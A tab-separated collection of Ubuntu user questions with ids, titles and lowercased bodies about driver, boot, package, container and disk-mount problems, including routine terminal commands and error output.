446796	ca n't change keyboard layout in some qt programs	the problem after a recent update in my ubuntu 13.10 with unity . when typing something in qt creator 3.0.1 or in my own program compiled with qt 5.2.1 ( from qt-project.org ) , i ca n't change keyboard layout . for example , if current layout was en when i launched the program , then only english letters will be typed in it , even if i switch to russian language . if i press alt+shift , the tray icon does change from en to ru , and it applies to most programs but not to some qt programs . to change layout , i have to relaunch program or to use copy-paste from an input field in another program ! not all qt programs have this problem â for example , kdevelop does n't . upgrading ubuntu from 13.10 to 14.04 beta did n't solve this problem ( while it fixed another bug , influencing shortcuts in russian layout in libreoffice ) . what can cause this strange behavior ?
446799	error installing linux-image-3.11.0-19-generic : `` kernel does not support non-pae cpu '' although cpu has pae	i am running ubuntu 12.04 kernel 3.11.0-15-generic on my ibm t42 which has a pentium m 1,7ghz processor which has 32bit physical adress extension ( pae ) . now i can not install latest security updates ( common ca certificates ) . the update managers returns : die folgenden pakete haben nicht erfüllte abhängigkeiten : linux-image-generic-lts-saucy : depends : linux-image-3.11.0-19-generic aber es ist nicht installiert which means dependency to linux-image-3.11.0-19-generic not fulfilled . when running apt-get install -f in my terminal i get the following error : paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig abhängigkeiten werden korrigiert ... fertig die folgenden zusätzlichen pakete werden installiert : linux-image-3.11.0-19-generic vorgeschlagene pakete : fdutils linux-lts-saucy-doc-3.11.0 linux-lts-saucy-source-3.11.0 linux-lts-saucy-tools die folgenden neuen pakete werden installiert : linux-image-3.11.0-19-generic 0 aktualisiert , 1 neu installiert , 0 zu entfernen und 1 nicht aktualisiert . 2 nicht vollständig installiert oder entfernt . es müssen noch 0 b von 57,3 mb an archiven heruntergeladen werden . nach dieser operation werden 154 mb plattenplatz zusätzlich benutzt . möchten sie fortfahren [ j/n ] ? j ( lese datenbank ... 173072 dateien und verzeichnisse sind derzeit installiert . ) entpacken von linux-image-3.11.0-19-generic ( aus ... /linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb ) ... **this kernel does not support a non-pae cpu . ** dpkg : fehler beim bearbeiten von /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb ( -- unpack ) : unterprozess neues pre-installation-skript gab den fehlerwert 1 zurück examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic fehler traten auf beim bearbeiten von : /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am wondering if the cpu doesn not support pae how could it be that kernel 3.11.0-15-generic runs on this cpu . can anybody please help ?
446800	can i build my ubuntu one	is it possible to install an ubuntu one server in my personal data center , so that all the work that is done will not be lost ?
446802	this kernel does not support a non-pae cpu	i received the error message : the package system is broken and i am not , to my knowledge , using third party repositories . following some of the recent posts on similar topics , i looked at other posts with similar issues and tried : sudo apt-get -f install results : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.11.0-19-generic suggested packages : fdutils linux-lts-saucy-doc-3.11.0 linux-lts-saucy-source-3.11.0 linux-lts-saucy-tools the following new packages will be installed linux-image-3.11.0-19-generic 0 to upgrade , 1 to newly install , 0 to remove and 28 not to upgrade . 2 not fully installed or removed . need to get 0 b/57.3 mb of archives . after this operation , 154 mb of additional disk space will be used . do you want to continue [ y/n ] ? indicated yes results : ( reading database ... 171297 files and directories currently installed . ) unpacking linux-image-3.11.0-19-generic ( from ... /linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb ) ... this kernel does not support a non-pae cpu . dpkg : error processing /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33~precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have absolutely no idea what to do next .
446804	unity stopped work after reboot and terminal was removed	i was using my laptop normally , then when i tried to use the terminal it was n't installed . i reboot and when i login the unity bar does n't appear . the recovery mode doesnâ´t work . internet access still work , when i press ctrl + alt + f1 , i can login and update . thanks for the help .
446812	install wifi driver in ubuntu 12.10	i just installed ubuntu 12.10 on an hp 2000 notebook , and after installation there is no list of wireless connections.what i can do to enable wifi ? ? 01:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] my kernel version is 3.5.0
446817	error installing two php versions ubuntu 12.04 with plesk 11.5	i 'm trying to install a additional php version ( 5.5.10 ) on a root server running ubuntu 12.04 but i keep running into errors during configure . it keeps giving me the following error : error : can not find imap library ( libc-client.a ) . please check your c-client installation . here is my php configuration script : ./configure ' -- with-libdir=lib64 ' ' -- cache-file=../config.cache ' ' -- prefix=/usr/local/php-5.5.10-cgi ' ' -- with-config-file-path=/usr/local/php-5.5.10-cgi/etc ' ' -- disable-debug ' ' -- with-pic ' ' -- disable-rpath ' ' -- enable-fastcgi ' ' -- with-bz2 ' ' -- with-curl ' ' -- with-freetype-dir=/usr/local/php-5.5.10-cgi ' ' -- with-png-dir=/usr/local/php-5.5.10-cgi ' ' -- enable-gd-native-ttf ' ' -- without-gdbm ' ' -- with-gettext ' ' -- with-gmp ' ' -- with-iconv ' ' -- with-jpeg-dir=/usr/local/php-5.5.10-cgi ' ' -- with-openssl ' ' -- with-pspell ' ' -- with-pcre-regex ' ' -- with-zlib ' ' -- enable-exif ' ' -- enable-ftp ' ' -- enable-sockets ' ' -- enable-sysvsem ' ' -- enable-sysvshm ' ' -- enable-sysvmsg ' ' -- enable-wddx ' ' -- with-kerberos ' ' -- with-unixodbc=/usr ' ' -- enable-shmop ' ' -- enable-calendar ' ' -- without-sqlite3 ' ' -- with-libxml-dir=/usr/local/php-5.5.10-cgi ' ' -- enable-pcntl ' ' -- with-imap ' ' -- with-imap-ssl ' ' -- enable-mbstring ' ' -- enable-mbregex ' ' -- with-gd ' ' -- enable-bcmath ' ' -- with-xmlrpc ' ' -- with-ldap ' ' -- with-ldap-sasl ' ' -- with-mysql=/usr ' ' -- with-mysqli ' ' -- with-snmp ' ' -- enable-soap ' ' -- with-xsl ' ' -- enable-xmlreader ' ' -- enable-xmlwriter ' ' -- enable-pdo ' ' -- with-pdo-mysql ' ' -- with-pdo-pgsql ' ' -- with-pear=/usr/local/php-5.5.10-cgi/pear ' ' -- with-mcrypt ' ' -- enable-intl ' ' -- without-pdo-sqlite ' ' -- with-config-file-scan-dir=/usr/local/php-5.5.10-cgi/php.d' i also installed this : apt-get install libc-client-dev build-essential libxml2-dev libpcre3-dev libbz2-dev libcurl4-openssl-dev libdb4.8-dev libjpeg-dev libpng12-dev libxpm-dev libfreetype6-dev libmysqlclient-dev postgresql-server-dev-9.1 libt1-dev libgd2-xpm-dev libgmp-dev libsasl2-dev libmhash-dev unixodbc-dev freetds-dev libpspell-dev libsnmp-dev libtidy-dev libxslt1-dev libmcrypt-dev appreciate any assistance . thank you so much
446818	create user with a blank password	how do i create a user with a blank password in lubuntu ? it seems that a password with a certain length is required when you create a new user . how do i avoid that ?
446819	openldap ldif auto generated password	i am working on with my ldif file where i first spesify poeple and groups , then generate two groups and one user . the problem i am having is how to automatic generate the password for the user . right now i specify the password as ldapuser1 . dn : dc=sysadmin1 , dc=hioa , dc=no objectclass : top objectclass : dcobject objectclass : organization dc : sysadmin1 o : sysadmin1 dn : ou=people , dc=sysadmin1 , dc=hioa , dc=no objectclass : organizationalunit ou : people dn : ou=groups , dc=sysadmin1 , dc=hioa , dc=no objectclass : organizationalunit ou : groups dn : cn=ldapgruppe1 , ou=groups , dc=sysadmin1 , dc=hioa , dc=no objectclass : posixgroup cn : ldapgruppe1 gidnumber : 30000 dn : cn=ldapgruppe2 , ou=groups , dc=sysadmin1 , dc=hioa , dc=no objectclass : posixgroup cn : ldapgruppe2 gidnumber : 40000 dn : uid=ldapuser1 , ou=people , dc=sysadmin1 , dc=hioa , dc=no objectclass : posixaccount objectclass : shadowaccount objectclass : inetorgperson sn : ldapuser1 uid : ldapuser1 cn : ldapuser1 displayname : ldapuser1 uidnumber : 30000 gidnumber : 30000 userpassword : ldapuser1 loginshell : /bin/bash homedirectory : /nfs/home/ldapuser1
446829	upload file using openstack cinder	can we upload file using openstack cinder ? i have installed openstack via devstack and has no swift enabled .
446830	my sound card is no recognized	i just installed ubuntu on my new laptop ( toshiba c55-a-1px ) and it works fine , the problem is that my head phones does n't work . after a bit of reserarching i found out that my sound card is not recognized : . my sound card is realtek alc269q-vb5-gr . what should i do ? i have tried to install the driver for my sound card but i ca n't find it . the version of ubuntu that i installed is 12.04. alsa -l says : **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : hda generic [ hda generic ] subdevices : 0/1 subdevice # 0 : subdevice # 0
446831	how to let built-in dhcp assign a static ip to lxc container based on name , not mac address	i know , that i can assign static ip manually , using /etc/network/interfaces . i also know , that i can read the mac address of the lxc container ( e.g . by looking for lxc.network.hwaddr entry in /var/lib/lxc/ < container-name > /config and assign the ip based using entries dhcp-host= < mac-addr > ,10.0.3.3 in /etc/dnsmasq.d/ < some file > . in the file /etc/default/lxc-net i read # uncomment the next line if you 'd like to use a conf-file for the lxcbr0 # dnsmasq . for instance , you can use 'dhcp-host=mail1,10.0.3.100 ' to have # container 'mail1 ' always get ip address 10.0.3.100 . # lxc_dhcp_confile=/etc/lxc/dnsmasq.conf that would suit my needs ; unfortunately doing so has no effect .
446832	click lock on ubuntu 12.04	i am a new ubuntu user and i really miss my click lock feature from windows . basically , what i need is this : i click on my left mouse button for 1 second ( or an other small time interval ) with the previous `` long click '' the drag feature is enabled i can let go from the click and drag objects wherever i want i click the left mouse button again , with a simple click to stop the dragging is there a way to do this in ubuntu ? i know that this question has been posted before , but i tried many ways and it still does n't work the way i want . i really need accessibility feature to do my normal daily activities . i really do n't want to go back to windows just because of this . thanks
446833	trusty 14.04 software updater `` failed to download repository '' info	it 's been a week or two since i 've seen an update from ubuntu and i find it odd that so close to the official release date there 's nothing . . . so after some googleage , i went through and tried sudo apt-get autoclean sudo apt-get autoremove as per one of the suggestions i found here . i hav n't changed any settings since i updated from saucy a few weeks ago . these are my failures in terminal err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en fetched 22.5 mb in 16s ( 1,360 kb/s ) w : failed to fetch http : //ppa.launchpad.net/pmjdebruijn/darktable-release/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pmjdebruijn/darktable-release/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . thanks in advance ! this community has been fantastic with questions i 've had in the past .
446834	how to recover ubuntu grub loader from windows	i have installed ubuntu os after that i have installed the windows 7 in another partition . but windows 7 is working fine but ubuntu grub loader is not there . i tried to installed dual os in different partitions only . then why the ubuntu is not loading . can anyone have solution to get the ubuntu .
446835	why does this command does n't run at startup	so i want to turn capslock into ctrl . from my google-fu the command to run is /usr/bin/setxkbmap -option `` ctrl : nocaps '' and it works when i run it at the terminal . but when i place it on 'startup appliacations ' the command fails to take effect . any idea why ?
446838	find and delete empty directories	how to find folders ( directories ) that are empty ( not containing any files ) and delete them by using terminal command or another method . filtration ( finding directories or files ) less than 'n ' bytes not safe because there are files which is only of 50 bytes but should be kept . i want to find only empty ( sub ) directories in prticular folder .
446842	`` device not found or ignored '' when creating physical volume with bcache	i 'm attempting to create an lvm volume on a bcache device , but getting `` device not found or recognized '' , despite lsblk clearly showing the device , and bcache state showing `` clean '' . os is ubuntu 13.10 using a default kernel and bcache-tools come from https : //launchpad.net/~g2p/+archive/storage/ my partition layout us as follows : sda 8:0 0 223.6g 0 disk ├─sda1 8:1 0 499m 0 part │ └─md1 9:1 0 499m 0 raid1 /boot ├─sda2 8:2 0 20g 0 part │ └─md2 9:2 0 20g 0 raid1 / ├─sda3 8:3 0 11.7g 0 part │ └─md3 9:3 0 11.6g 0 raid1 └─sda4 8:4 0 191.5g 0 part └─md4 9:4 0 191.3g 0 raid1 sdb 8:16 0 223.6g 0 disk ├─sdb1 8:17 0 499m 0 part │ └─md1 9:1 0 499m 0 raid1 /boot ├─sdb2 8:18 0 20g 0 part │ └─md2 9:2 0 20g 0 raid1 / ├─sdb3 8:19 0 11.7g 0 part │ └─md3 9:3 0 11.6g 0 raid1 └─sdb4 8:20 0 191.5g 0 part └─md4 9:4 0 191.3g 0 raid1 sdc 8:32 0 1.8t 0 disk └─sdc1 8:33 0 1.8t 0 part └─md5 9:5 0 1.8t 0 raid1 sdd 8:48 0 1.8t 0 disk └─sdd1 8:49 0 1.8t 0 part └─md5 9:5 0 1.8t 0 raid1 i intend to use /dev/md5 as my backing device , and /dev/md4 as my cache device . to create the backing device , i 've done the following : make-bcache -b /dev/md5 uuid : 4264d526-cd5e-43d9-a969-3eb2bf81aa91 set uuid : e4bee610-da76-49ff-8636-08b80005a826 version : 1 block_size : 1 data_offset : 16 similarly , to create the caching device : make-bcache -c /dev/md4 uuid : 8c425d36-c4a9-4e0b-9c78-a633afabf359 set uuid : 5f807648-f510-4315-8665-e650773accf1 version : 0 nbuckets : 391811 block_size : 1 bucket_size : 1024 nr_in_set : 1 nr_this_dev : 0 first_bucket : 1 attach the backing device : echo 5f807648-f510-4315-8665-e650773accf1 > /sys/block/bcache0/bcache/attach confirm the bcache0 device appears in lsblk ( it does ) , and check the bcache state : cat /sys/block/bcache0/bcache/state clean set writeback mode : echo writeback > /sys/block/bcache0/bcache/cache_mode create lvm physical volume : pvcreate /dev/bcache0 device /dev/bcache0 not found ( or ignored by filtering ) . even after a reboot to force a re-read , i still get this same error . anybody see what i 'm doing wrong ?
446849	problem installing kubuntu desktop in ubuntu	when i tried to install kubuntu-desktop using the given command , sudo apt-get install kubuntu-desktop sudo the following error appeared . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergerlist /var/liv/apt/lists/in.archive.ubuntu.com_ubuntu_dists_quantal-backports_universe_i18n_translation-en e : the package lists or status file could not be parsed or loaded . what should i do in order to install it ?
446850	why are all my books chapters mixed up with rhythmbox ?	i have moved a book from rhythmbox to my ipod classic . in rhythmbox the chapters are following each other . on the ipod they are in a random order . why ? shuffle is off .
446851	ca n't bootstrap with juju due to `` error back from server : 401 unauthorized ''	i have this little maas with only one node ready to deploy ( ubuntu 12.04 precise pangolin ) ... i was trying to set up the juju enviroment but i continously get this error $ juju bootstrap bootstrap failed , destroying environment error bootstrap failed , and the environment could not be destroyed : gomaasapi : got error back from server : 401 unauthorized ( invalid consumer . ) error could not access file 'a576cc0e-bf67-4b7c-8c22-eacb51826eaf-provider- state ' : gomaasapi : got error back from server : 401 unauthorized ( invalid consumer . ) i tried changing the api key to a fresh one from maas but i did n't help , actually i got the same error code . i am communicating throught an ssh connection over a vpn from win7 with putty , the server and my host are autenthicated throught rsa key , i tried to change the enviroment.yaml but to my eyes it seems all correct . does anybody know what 's wrong ?
446852	how can i get my xp/ubuntu 12.04 dual boot to shut down or suspend/ wake up properly ?	freshly installed onto a ibm thinkcentre : ( though there has been an update ) restarts on shut down and wakes up from suspend with a brief whoosh of the fan and a blank screen . things got a bit mixed up during install and wound up in us time zone ( corrected later ) and have since noticed updates are set for us server so have reset for uk . possible cause ? cure ? i am a newcomer to all this , but fast joining the ranks of 'restarts to no avail ' . please try to bear in mind when responding , thanks .
446857	firefox in ubuntu does not load	i have just installed ubuntu . everything seems fine , but firefox will only load google , bing and gmail . all other web pages stall ; just keeps loading without getting anywhere . this is hopeless because you can not update or do anything . i have once installed ubuntu on my harddrive , and now on a usb stick : no difference . what is the matter ?
446858	how to run windows games on ubuntu 12.04 ? ( bioshock infinite or alice madness returns )	i really want to play `` bioshock infinite '' and `` alice madness returns '' on my ubuntu 12.04 ( i 've got a dvd-rom of the games ) but when i tried to run the setup with wine program loader the window froze and did n't respond : \ then i tried to install the games with `` playonlinux '' but i could n't find the games in the part when you need to search the games in the program to install them . can somebody please tell me how can i get those games to run ? p.s . sorry for my bad english : p
446861	software center - `` edit- > software sources '' disabled	i am trying to download winhq from here . when trying to add the winehq ppa repository ( as detailed in the link above ) after opening ubuntu software center i can not select edit- > software sources . the menu item is disabled i am using ubuntu 13.10 any ideas ?
446863	how do i get wacom tablet drivers to initiate with new intuos pro series ?	just as the question says . this issue happens under ubuntu 13.x ( and also linux mint ) . when wacom decided to re-release their wacom intuos pro series , the current linux-wacom drivers were no good , so i had to go manually build and install the input-wacom-0.20.0 drivers to replace the obsolete wacom.ko driver so that it will recognise wacom intuos pro pth-4xx series , previously known as wacom intuos 5 series . thing is , the drivers are working and are recognised , however no input is received when i got to use my intuos pro pth-451/k , that is until i got plug in my old tablet , my wacom bamboofun cte-450/w just to get the drivers to actually work from plugging it into the system so that my pth-451/k tablet will work . i do n't know why or how , but just plugging in my old wacom tablet initiates the drivers . i wo n't have my old wacom bamboofun forever , so i just wan na know a work fix to make it so that the wacom driver initiates whenever my wacom intuos pro pen and touch in plugged in my system . i can just plug in my bamboofun for a couple seconds and safely remove while being able to use my other tablet just fine , but this really is n't ideal , and need a permanent fix i could add to either a script or modify to the kernel when it loads the drivers at boot .
446866	returning to host machine from linux container	i have installed lxc on my server , then created an lxc container ( ubuntu template and name is master ) . next i started my container master , then logged in by command lxc-console , then i logout from container and return to my host server . is there any command for that ? ctrl+a+q is not what i want , because it takes me to login screen and i can not get rid of that .
446870	no sound in xubuntu after starting from command line	when i first installed xubuntu , everything was working fine . then i encountered a problem where it would start up in the command line with no gui , but i fixed that by typing startx . the problem , though , is that whenever i start it up from the command line , the sound is muted . i am using version 12.04 on a dell dimension 3000 .
446872	usb 3.0 problems with a gigabyte motherboard in ubuntu 14.04	[ this has been translated from spanish ] hi very good morning or afternoon as the case of venezuela and am andruwx little over a month ago i bought a card for mother www.amazon.com gigabyte model ga- f2a88x - up4 is also socket fm2 + i have an amd processor will apu a10 6800k . the issue goes well i will be brief and to the point the day they arrived i decided to put together my two pieces all put together after i realize i had given my dvd which had recorded ubuntu 14.04 and good for only decided to try to install windows 7 and i could download a new iso of ubuntu but did not have near or close dvd or pendrive , after installing windows 7 installing drivers and i realize that the motherboard works fine . the next day buy a blank dvd download ubuntu install ubuntu 14.04 record it and then did the respective upgrade the operating system and to place proprietary drivers for the apu as it brings integrated graphics radeon 8600d here comes the problem 14.04 ubuntu does not recognize me or not activate the usb 3.0 card brings my mother , i mean the model motherboard gigabyte ga- f2a88x - up4 brings 4-port usb 3.0 and 2 usb 2.0 ports these if i work . those who do not own usb 3.0 ports work when i connect a webcam , an external drive , keyboard , mouse , does n these peripherals and recall anything that tells them higher up who had first installed windows 7 that had no dvd ubuntu windows good if i run the 4 usb 3.0 my request is there anyone who can help me to give solution to this that i recognize ubuntu 14.04 usb 3.0 ports and i really needed to do . please help meeee here is a link to my motherboard 's specifications : http : //www.gigabyte.com/products/product-page.aspx ? pid=4709 # ov
446874	wireless adapter problem with edubuntu 12.04	i am using edubuntu 12.04 on hp probook . my wireless symbol disappeared after installing some software from the software center . i have un-installed them but it not appear and wireless controller of device is realtek semiconductor [ 10ec:0c ] .
446878	why do i 've two entries per server in known_hosts file ?	on my mac i 've 1 entry per server in the ~/.ssh/known_hosts file , in ubuntu i noticed there are two created per server . why is that ? format is : |1|wwwwwwwwwwwwwww=|wwwwwwwwww= ecdsa-sha2-nistp256 aaaaaaaaaa+aaaaa= |1|vvvvvvvvvvvvvvv=|vvvvvvvvvv= ecdsa-sha2-nistp256 aaaaaaaaaa+aaaaa= in both entries , first section before ecdsa-sha2-nistp256 is different . after ecdsa-sha2-nistp256 it is same ( pub key i imagine ) . i ssh into server a , and from there i ssh into server b. i 'm not manually adding entries , i see ubuntu warning and allow it to add to known_hosts file . i blanked known_hosts file for this test . i 've a reasonable doubt that extra entry is for ipv6 address , even though i 've not used it to connect . does ubuntu add it automatically if available ?
446880	i am using ubuntu 12.04 as live desktop cd for banking am i subject to the heartbleed bug ?	i am not running any apache or any thing that triggers ssl libray , so is there a service in ubuntu that runs open ssl by default ? so , i am just booting live session for internet browser . am i safe ?
446890	installing ubuntu with windows - installer ca n't see partitions	i know there were many questions in this area , but i 'm still unable to install ubuntu without formating whole disk . i 've got windows 8 and 4 partitions 100 gb - windows 30 gb 117 gb 418 gb and 30gb unallocated space i made in windows disk management tool ( i thought ubuntu will see it ) ubuntu ( live ) can perfectly see all partitions and i have access to it : sudo lsblk -o name , fstype , size , mountpoint , label name fstype size mountpoint label sda 698,7g ├─sda1 ntfs 100m /media/ubuntu/zastrzeżone przez zastrzeżone przez system ├─sda2 ntfs 100,9g /media/ubuntu/8ef8f38df8f37237 ├─sda3 ntfs 30g /media/ubuntu/10a28513a284ff0a ├─sda4 ntfs 117,7g /media/ubuntu/muzyka muzyka └─sda5 ntfs 418,4g /media/ubuntu/nowy nowy sdb 14,7g └─sdb1 vfat 14,7g /cdrom ejzepen sr0 1024m loop0 squashfs 842,7m /rofs but installer sees disk like that : ( see screenshot ) i want to install ubuntu on 30gb unallocated space or make a new partition out of `` nowy '' partition without without formatting it . sudo fdisk -lu disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4f693826 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs partition 1 does not start on physical sector boundary . /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 211765247 105779200 42 sfs /dev/sda4 211765248 1465147119 626690936 42 sfs disk /dev/sdb : 15.8 gb , 15805186048 bytes 255 heads , 63 sectors/track , 1921 cylinders , total 30869504 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 128 30869503 15434688 c w95 fat32 ( lba )
446891	upgrading to new version of ubuntu	i recently have installed ubuntu 12.04 lts , then i notice that ubuntu will release newer lts version very soon . i have dual boot between ubuntu 12.04 lts and windows 7 , but what if i upgrading my ubuntu to new version does it : erase my windows 7 os ? make me to download new update like im installing fresh ubuntu os ? does it erase my data ( music , picture , etc etc ) inside my ubuntu or windows 7 ? sorry for a very 'unacknowledged ' question about it , i am very new to ubuntu , i just want to know . some information will help me a lot !
446892	can not use sudo	i am trying to install unity tweak , and i am having this problem that when i type in the terminal : sudo apt-get repository unity-lens-music unity-lens-photo unity-lens-video in the terminal it ask for password but do not work every time i type the password . thanks .
446896	can not get unattended-upgrades to work	i am using ubuntu 12.04.3 lts and i am currently trying to get unattended-upgrades to work . so far i followed this documentation : 12.04-serverguide-automatic-updates i installed the package : apt-get install unattended-upgrades i edited /etc/apt/apt.conf.d/50unattended-upgrade after that i tried to edit /etc/apt/apt.conf.d/10periodic , but that file was missing . does one have to create it manually ? finally , i wondered how starts triggering unattended-upgrades and in which intervals ? the file /etc/cron.daily/apt is missing on my system as well . should it be there ? seems to be a common problem : unattended-upgrades not running , /etc/cron.daily/apt missing
446898	problems after installing alice madness returns game	i installed the game `` alice madness returns '' on my ubuntu 12.04 and everything went ok until the part where you activate the game . i got this error message box : program error the program alicemadnessreturns.exe has encountered a serious problem and needs to close . we are sorry for the inconvenience . this can be caused by a problem in the program or a deficiency in wine . you may want to check the application database for tips about running this application . help please . i do n't know what to do . : \
446901	how to get pixel length of a button text string in qml ?	i need to know button text length in pixels . how to do that ?
446909	i need to skip the grub menu on a dual-boot system	i use ubuntu 12.04 lts 32 bit , but i share the computer with my family who use windows 7 , so i want to skip the grub menu and allow to boot to windows automatically , and to enter the grub only if i press a certain key or something like this at boot time .
446910	dual boot problems 13.10	my windows 8.1 loads up fine if i turn on secure boot but for me to load up ubuntu i have to change my settings to legacy mode and the reason i installed it this way was because it wouldnt display the installation screen in uefi settings . any solutions to this problem ? i dont want to edit anything yet on my own at this point before i damage my boot file . thanks !
446911	how to use xboxdrv daemon with an unknown controller ?	i have a thrustmaster gpx lightback , wich is just a `` copy '' of the original x360 controller and i can use it in my xbox without any issues . i can use it with xboxdrv with this : xboxdrv -s -- device-by-id 24c6:5b02 -- type xbox360 now i want to use xboxdrv as a daemon , but ca n't figure out how to set the daemon to read this controller . i tried this : xboxdrv -- type xbox360 -- device-by-id 24c6:5b02 -- dbus session -- daemon -- id 0 -- led 2 -- match usbid=24c6:5b02 but it do n't recognize the joystick . all the status leds stay blinking . edit : figured out that the latest version of xboxdrv ( 0.8.5 ) added support to my device , so i do n't need to use the `` -- device-by-id '' and `` -- type '' anymore . but other users could run into this issue when using other unsupported controllers .
446912	can microsoft detect pirate licence after formatted & installed ubuntu in hard disk ?	i was using windows pirated version , but now i am using ubuntu 12.0 in same computer . i have full formatted my hard disk also . i request you please give me answer for : can microsoft trace previously pirated license from computer hdd . what is the best hdd formatting method/software so microsoft will not trace license from hdd . ? thanks in advance .
446916	recover accidently deleted eclipse ini file	i accidentaly switched my eclipse ini file with an android eclipse ini file . i did not create a backup of the old ini file , so that option is out of the door . i do n't know where to get a working one , nor do i know how to fix the current one . does anybody have any insight as to how to fix this , and restore my old one ? -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20120913-144807 -product com.android.ide.eclipse.adt.package.product -showsplash com.android.ide.eclipse.adt.package.product -- launcher.xxmaxpermsize 256m -- launcher.defaultaction openfile -vmargs -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms512m -xmx1524m -declipse.buildid=v22.2.1-833290 thats the current one in case you were wondering . i believe it is in the product package info , but i 'm not 100 % sure . unfortunately eclipse wont start because the eclipse executable launcher was unable to locate its companion shared library . edit : i also just tried opening from the terminal , but i get this error , it provides a bit more insight . plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20120913-144807 : can not open shared object file : no such file or directory any help is appreciated . thanks .
446918	d-link wireless n nano usb adapter dwa-131 with ubuntu 13.10	wireless n nano usb adapter dwa-131 , i 'm not able to make it working on ubuntu 13.10 . i read a number of threads but i could not find the solution . it is certainly due to my limited knowledge of ubuntu/linux . i 'd be grateful to any one able to help . thank you .
446920	change keyring password after resetting password with `` passwd '' : ubuntu 13.10	i forgot my ubuntu 13.10 , so i reset my password from revoverymode using `` passwd '' . now when i log in to my system the keyring prompts `` the password you use to login to your computer no longer matches that of your login keyring '' . i googled to change the keyring password but it requires my old password that i do n't remember . any suggestions on how to solve this . ?
446924	unable to mount 64 sandisk extreme	when i connect my vid cam via usb or put sd card direct in to the pc slot , it tells me it is unable to mount and then mention somethimg called exfat . i have no idea how to over come this .
446925	why is n't the gear menu there ?	i would like to shut down this computer but the button is n't in the upper right corner . ubuntu 13.10 . changing the theme to default does n't help .
446927	what is the local path of a mounted iscsi ?	i am using a program which uses open-iscsi to mount a remote disk on /dev/disks/by-path directory . in this directory i have something like ip-192.168.1.2:3260-iscsi-iqn.iqnname : remotedsk-lun-0 now..how to enter in that disk throught the command line ? a simple cd /dev/disks/by-path/ip-192.168.1.2:3260-iscsi-iqn.iqnname : remotedsk-lun-0 does n't work ...
446931	how to mount problematic internal hard disk using ubuntu 13.10	i have a laptop with windows 7 . one day i can not access windows . so i 'm trying to use ubuntu 13.10 live usb ( `` try only '' version ) to retrieve important files in the internal hard disk . when i try to open the internal hard disk it says that : unable to access `` 86gb volume '' error mounting /dev/sda2 at /media/ubuntu/34bc6628bc65e538 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/ubuntu/34bc6628bc65e538 '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . help me , please
